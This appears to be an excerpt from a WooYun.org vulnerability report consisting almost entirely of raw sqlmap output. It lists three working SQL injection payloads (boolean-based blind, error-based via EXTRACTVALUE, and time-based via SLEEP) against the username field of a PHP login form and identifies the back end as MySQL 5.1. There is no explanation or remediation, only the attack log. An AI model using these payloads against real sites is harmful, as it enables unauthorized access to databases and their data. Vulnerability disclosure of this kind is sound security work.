WooYun.org

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
 clause
    Payload: username=admin' RLIKE (SELECT (CASE WHEN (6856=6856) THEN 0x61646d6
96e ELSE 0x28 END)) AND 'aABI'='aABI&password=admin&action=login
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (EXTRACTVALUE)
    Payload: username=admin' AND EXTRACTVALUE(4167,CONCAT(0x5c,0x716a716271,(SEL
ECT (ELT(4167=4167,1))),0x71766a7171)) AND 'WoqH'='WoqH&password=admin&action=lo
gin
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: username=admin' AND SLEEP(50) AND 'sbfZ'='sbfZ&password=admin&actio
n=login
---
[13:43:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.4
back-end DBMS: MySQL 5.1